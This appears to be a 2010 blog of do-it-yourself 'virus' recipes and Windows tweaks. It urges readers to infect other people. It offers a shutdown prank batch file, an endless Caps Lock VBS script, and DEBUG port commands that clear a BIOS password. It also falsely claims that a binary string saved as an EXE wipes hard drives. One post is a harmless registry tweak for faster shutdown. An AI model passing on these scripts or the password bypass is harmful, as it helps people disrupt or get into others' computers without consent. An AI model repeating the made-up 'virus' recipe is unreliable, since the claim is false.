Monday, September 13, 2010

Virus that remove HDD data and corrupt HDD.(Do IT Yourself)

Step 1.


Copy The Following In Notepad Exactly as it says





01001011000111110010010101010101010000011111100000



Step 2.

Save As An EXE Any Name Will Do



Step 3.

Send the EXE to People And Infect

How to improve on shutdown time ? Close apps automatically & quickly at shutdown

step1: Open Registry by going to START-RUN and typing REGEDIT.

step2: Navigate to HKEY_CURRENT_USER\CONTROL PANEL\DESKTOP and look for
          AutoEndTasks.

step3: On my computer default value is 0. Change it to 1. Thats all.

step4: Further more you can reduce the time it takes for Windows to issue kill directive to all active/hung   applications.

In doing this only constraint that you should make sure exists is that HungAppTimeout is greater than WaitToKillAppTimeout. Change the values of WaitToKillAppTimeout to say 3500 (since default value for HungAppTimeout 5000 and for WaitToKillAppTimeout is 20000)

Tuesday, June 15, 2010

SHUT DOWN VIRUS

TYPE THE CODE IN A NOTEPAD AND SAVE IT "SHUT.BAT" FILE NAME

@echo off


msg * I don't like you

shutdown -c "Error! You are FOOL !" -s

**********ENJOY******************

CREATE A CAPS LOCK VIRUS

WRITE DOWN THE FOLLOWING CODE IN A NOTEPAD  AND SAVE IT A NAME "CAPS.VBS"

Set wshShell =wscript.CreateObject("WScript.Shell")


do

wscript.sleep 100

wshshell.sendkeys "{CAPSLOCK}"

loop

***************************ENJOY***********************

Wednesday, June 2, 2010

BIOS PASSWORD CRACK (SUCCESS 99 %)

GO TO  DOS prompt and type:

DEBUG hit enter

-o 70 2e hit enter

-o 71 ff hit enter

-q hit enter

exit hit enter

Restart the computer.